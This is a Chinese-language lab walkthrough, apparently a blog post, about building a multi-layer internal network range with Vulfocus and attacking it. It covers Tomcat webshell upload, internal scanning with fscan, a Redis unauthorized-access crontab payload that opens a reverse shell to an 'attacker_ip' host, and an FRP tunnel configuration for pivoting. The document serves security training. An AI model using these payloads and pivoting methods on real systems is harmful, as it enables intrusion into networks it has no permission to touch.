从靶场搭建到实战我用Vulfocus编排了一个‘打穿三层内网’的完整复盘在网络安全领域靶场训练是提升实战能力的关键环节。不同于传统的单一漏洞复现现代红队演练更注重攻击链的完整性和真实内网环境的模拟。本文将分享如何利用Vulfocus这一开源漏洞集成平台从零开始构建一个包含多层内网的复杂靶场环境并详细记录从外网突破到内网横向移动的全过程。1. Vulfocus靶场环境搭建1.1 平台部署与基础配置Vulfocus的核心优势在于其基于Docker的轻量级架构使得漏洞环境的部署和管理变得异常简单。以下是部署的关键步骤# 拉取最新版Vulfocus镜像 docker pull vulfocus/vulfocus:latest # 运行容器替换your_ip为实际服务器IP docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IPyour_ip vulfocus/vulfocus部署完成后通过浏览器访问服务器IP即可进入Web管理界面。首次登录使用默认凭证admin/admin强烈建议立即修改密码特别是在公网环境。1.2 漏洞镜像管理与网络规划Vulfocus支持从官方仓库直接下载预置的漏洞环境镜像。对于多层内网模拟网络规划尤为关键网络层级用途说明典型漏洞配置DMZ区边缘暴露服务Tomcat弱口令、Weblogic反序列化办公内网第一层内网Redis未授权、SMB共享漏洞核心内网敏感数据区数据库漏洞、域控漏洞实战建议在编排场景前先通过docker network create命令创建多个自定义网络模拟真实企业网络的分区隔离。2. 多层内网场景编排实战2.1 边缘节点突破从Web漏洞到立足点选择Tomcat弱口令作为初始突破口模拟常见的企业边缘服务器配置。上传Webshell时需注意将JSP马压缩为ZIP后重命名为WAR扩展名使用冰蝎等工具连接时检查默认密钥是否匹配首次连接后立即进行环境侦察whoami /all # 查看当前权限 ipconfig /all # 获取网络配置 systeminfo # 收集系统信息2.2 内网信息搜集与漏洞定位在获取边缘节点控制权后使用轻量级扫描工具进行内网探测# 使用fscan进行快速内网扫描 ./fscan -h 192.168.1.0/24 -o result.txt扫描结果通常会揭示内网中的关键服务。在本案例中我们发现了一台存在Redis未授权访问的服务器这是内网横向移动的理想跳板。3. 内网横向移动的挑战与应对3.1 Redis未授权利用的实战变通传统Redis利用方法如crontab反弹Shell在容器环境中常会遇到障碍# 典型Redis利用命令可能失效 redis-cli -h 10.10.10.10 set x \n* * * * * bash -i /dev/tcp/attacker_ip/port 01\n config set dir /var/spool/cron/ config set dbfilename root save当发现目标容器缺少cron服务时可尝试以下替代方案写入SSH密钥如目标开放SSH主从复制RCERedis 4.x/5.x模块加载RCE需编译恶意.so3.2 隧道搭建的实用技巧在无法直接反弹Shell的情况下FRP隧道成为穿透内网的有效手段# frpc.ini 示例配置 [common] server_addr your_vps_ip server_port 7000 [redis_tunnel] type tcp local_ip 10.10.10.10 local_port 6379 remote_port 16379关键点通过冰蝎等已控节点上传FRP客户端配置时需注意检查防火墙规则使用非标准端口避免检测测试隧道连通性后再进行后续操作4. 靶场训练的经验总结在多次实战演练中我们积累了一些宝贵经验容器环境特异性缺少常用命令如nc、wget软件源不可用权限限制严格可靠的后渗透方法静态编译工具上传内存加载PE/ELF利用现有服务如Python/Perl网络配置检查清单容器间网络连通性NAT规则是否正确防火墙策略模拟真实的红队作战远比靶场复杂但通过Vulfocus这样的平台我们可以反复磨练核心技能当面对真实网络环境时这些经验将成为突破防线的关键。